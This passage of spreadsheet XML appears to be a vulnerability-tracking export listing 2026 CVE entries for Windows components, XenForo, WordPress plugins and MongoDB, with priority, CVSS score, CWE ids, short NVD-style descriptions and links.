      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69384</t>
        </is>
      </c>
      <c r="D850" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E850" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F850" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G850" s="5" t="inlineStr"/>
      <c r="H850" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I850" s="5" t="inlineStr"/>
      <c r="J850" s="5" t="inlineStr"/>
      <c r="K850" s="5" t="inlineStr"/>
      <c r="L850" s="5" t="inlineStr"/>
      <c r="M850" s="5" t="inlineStr"/>
      <c r="N850" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q850" s="5" t="inlineStr"/>
      <c r="R850" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S850" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Virtual Hard Disk (VHD) Miniport Driver allows an unauthorized attacker to deny service locally.</t>
        </is>
      </c>
      <c r="T850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69384</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69396</t>
        </is>
      </c>
      <c r="D851" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E851" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F851" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G851" s="5" t="inlineStr"/>
      <c r="H851" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I851" s="5" t="inlineStr"/>
      <c r="J851" s="5" t="inlineStr"/>
      <c r="K851" s="5" t="inlineStr"/>
      <c r="L851" s="5" t="inlineStr"/>
      <c r="M851" s="5" t="inlineStr"/>
      <c r="N851" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O851" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P851" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q851" s="5" t="inlineStr"/>
      <c r="R851" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S851" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69451</t>
        </is>
      </c>
      <c r="D852" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E852" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F852" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G852" s="5" t="inlineStr"/>
      <c r="H852" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I852" s="5" t="inlineStr"/>
      <c r="J852" s="5" t="inlineStr"/>
      <c r="K852" s="5" t="inlineStr"/>
      <c r="L852" s="5" t="inlineStr"/>
      <c r="M852" s="5" t="inlineStr"/>
      <c r="N852" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O852" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P852" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q852" s="5" t="inlineStr"/>
      <c r="R852" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S852" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69451</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69460</t>
        </is>
      </c>
      <c r="D853" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E853" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F853" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G853" s="5" t="inlineStr"/>
      <c r="H853" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I853" s="5" t="inlineStr"/>
      <c r="J853" s="5" t="inlineStr"/>
      <c r="K853" s="5" t="inlineStr"/>
      <c r="L853" s="5" t="inlineStr"/>
      <c r="M853" s="5" t="inlineStr"/>
      <c r="N853" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O853" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P853" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q853" s="5" t="inlineStr"/>
      <c r="R853" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S853" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69460</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69482</t>
        </is>
      </c>
      <c r="D854" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E854" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F854" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G854" s="5" t="inlineStr"/>
      <c r="H854" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I854" s="5" t="inlineStr"/>
      <c r="J854" s="5" t="inlineStr"/>
      <c r="K854" s="5" t="inlineStr"/>
      <c r="L854" s="5" t="inlineStr"/>
      <c r="M854" s="5" t="inlineStr"/>
      <c r="N854" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P854" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q854" s="5" t="inlineStr"/>
      <c r="R854" s="5" t="inlineStr">
        <is>
          <t>CWE-379</t>
        </is>
      </c>
      <c r="S854" s="5" t="inlineStr">
        <is>
          <t>Creation of temporary file in directory with insecure permissions in Windows Error Reporting allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="T854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69482</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69536</t>
        </is>
      </c>
      <c r="D855" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E855" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F855" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G855" s="5" t="inlineStr"/>
      <c r="H855" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I855" s="5" t="inlineStr"/>
      <c r="J855" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K855" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L855" s="5" t="inlineStr"/>
      <c r="M855" s="5" t="inlineStr"/>
      <c r="N855" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O855" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P855" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q855" s="5" t="inlineStr"/>
      <c r="R855" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S855" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69553</t>
        </is>
      </c>
      <c r="D856" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E856" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F856" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G856" s="5" t="inlineStr"/>
      <c r="H856" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I856" s="5" t="inlineStr"/>
      <c r="J856" s="5" t="inlineStr"/>
      <c r="K856" s="5" t="inlineStr"/>
      <c r="L856" s="5" t="inlineStr"/>
      <c r="M856" s="5" t="inlineStr"/>
      <c r="N856" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O856" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P856" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q856" s="5" t="inlineStr"/>
      <c r="R856" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S856" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Hyper-V allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69553</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69597</t>
        </is>
      </c>
      <c r="D857" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E857" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F857" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G857" s="5" t="inlineStr"/>
      <c r="H857" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I857" s="5" t="inlineStr"/>
      <c r="J857" s="5" t="inlineStr"/>
      <c r="K857" s="5" t="inlineStr"/>
      <c r="L857" s="5" t="inlineStr"/>
      <c r="M857" s="5" t="inlineStr"/>
      <c r="N857" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O857" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P857" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q857" s="5" t="inlineStr"/>
      <c r="R857" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S857" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69597</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69602</t>
        </is>
      </c>
      <c r="D858" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E858" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F858" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G858" s="5" t="inlineStr"/>
      <c r="H858" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I858" s="5" t="inlineStr"/>
      <c r="J858" s="5" t="inlineStr"/>
      <c r="K858" s="5" t="inlineStr"/>
      <c r="L858" s="5" t="inlineStr"/>
      <c r="M858" s="5" t="inlineStr"/>
      <c r="N858" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O858" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P858" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q858" s="5" t="inlineStr"/>
      <c r="R858" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S858" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows PrintWorkflowUserSvc allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69602</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69688</t>
        </is>
      </c>
      <c r="D859" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E859" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F859" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G859" s="5" t="inlineStr"/>
      <c r="H859" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I859" s="5" t="inlineStr"/>
      <c r="J859" s="5" t="inlineStr"/>
      <c r="K859" s="5" t="inlineStr"/>
      <c r="L859" s="5" t="inlineStr"/>
      <c r="M859" s="5" t="inlineStr"/>
      <c r="N859" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O859" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P859" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q859" s="5" t="inlineStr"/>
      <c r="R859" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S859" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69688</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69706</t>
        </is>
      </c>
      <c r="D860" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E860" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F860" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G860" s="5" t="inlineStr"/>
      <c r="H860" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I860" s="5" t="inlineStr"/>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr"/>
      <c r="L860" s="5" t="inlineStr"/>
      <c r="M860" s="5" t="inlineStr"/>
      <c r="N860" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O860" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P860" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q860" s="5" t="inlineStr"/>
      <c r="R860" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S860" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69706</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69757</t>
        </is>
      </c>
      <c r="D861" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E861" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F861" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G861" s="5" t="inlineStr"/>
      <c r="H861" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I861" s="5" t="inlineStr"/>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr"/>
      <c r="L861" s="5" t="inlineStr"/>
      <c r="M861" s="5" t="inlineStr"/>
      <c r="N861" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O861" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P861" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q861" s="5" t="inlineStr"/>
      <c r="R861" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S861" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69757</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69761</t>
        </is>
      </c>
      <c r="D862" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E862" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F862" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G862" s="5" t="inlineStr"/>
      <c r="H862" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I862" s="5" t="inlineStr"/>
      <c r="J862" s="5" t="inlineStr"/>
      <c r="K862" s="5" t="inlineStr"/>
      <c r="L862" s="5" t="inlineStr"/>
      <c r="M862" s="5" t="inlineStr"/>
      <c r="N862" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O862" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P862" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q862" s="5" t="inlineStr"/>
      <c r="R862" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S862" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69761</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69775</t>
        </is>
      </c>
      <c r="D863" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E863" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F863" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G863" s="5" t="inlineStr"/>
      <c r="H863" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I863" s="5" t="inlineStr"/>
      <c r="J863" s="5" t="inlineStr"/>
      <c r="K863" s="5" t="inlineStr"/>
      <c r="L863" s="5" t="inlineStr"/>
      <c r="M863" s="5" t="inlineStr"/>
      <c r="N863" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O863" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P863" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q863" s="5" t="inlineStr"/>
      <c r="R863" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S863" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69775</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73321</t>
        </is>
      </c>
      <c r="D864" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E864" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F864" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G864" s="5" t="inlineStr"/>
      <c r="H864" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I864" s="5" t="inlineStr"/>
      <c r="J864" s="5" t="inlineStr"/>
      <c r="K864" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L864" s="5" t="inlineStr"/>
      <c r="M864" s="5" t="inlineStr"/>
      <c r="N864" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O864" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P864" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q864" s="5" t="inlineStr"/>
      <c r="R864" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S864"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T864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81781</t>
        </is>
      </c>
      <c r="D865" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E865" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F865" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G865" s="5" t="inlineStr"/>
      <c r="H865" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I865" s="5" t="inlineStr"/>
      <c r="J865" s="5" t="inlineStr"/>
      <c r="K865" s="5" t="inlineStr"/>
      <c r="L865" s="5" t="inlineStr"/>
      <c r="M865" s="5" t="inlineStr"/>
      <c r="N865" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O865" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P865" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q865" s="5" t="inlineStr"/>
      <c r="R865" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S865" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Unbounce Unbounce Landing Pages unbounce allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Unbounce Landing Pages: from n/a through 1.1.4.</t>
        </is>
      </c>
      <c r="T865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81781</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81798</t>
        </is>
      </c>
      <c r="D866" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E866" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F866" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G866" s="5" t="inlineStr"/>
      <c r="H866" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I866" s="5" t="inlineStr"/>
      <c r="J866" s="5" t="inlineStr"/>
      <c r="K866" s="5" t="inlineStr"/>
      <c r="L866" s="5" t="inlineStr"/>
      <c r="M866" s="5" t="inlineStr"/>
      <c r="N866" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O866" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P866" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q866" s="5" t="inlineStr"/>
      <c r="R866" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S866" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Appointments allows DOM-Based XSS.
This issue affects Easy Appointments: from n/a through 4.0.2.1.</t>
        </is>
      </c>
      <c r="T866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81798</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="D867" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E867" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F867" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G867" s="5" t="inlineStr"/>
      <c r="H867" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I867" s="5" t="inlineStr"/>
      <c r="J867" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K867" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L867" s="5" t="inlineStr"/>
      <c r="M867" s="5" t="inlineStr"/>
      <c r="N867" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O867" s="5" t="inlineStr">
        <is>
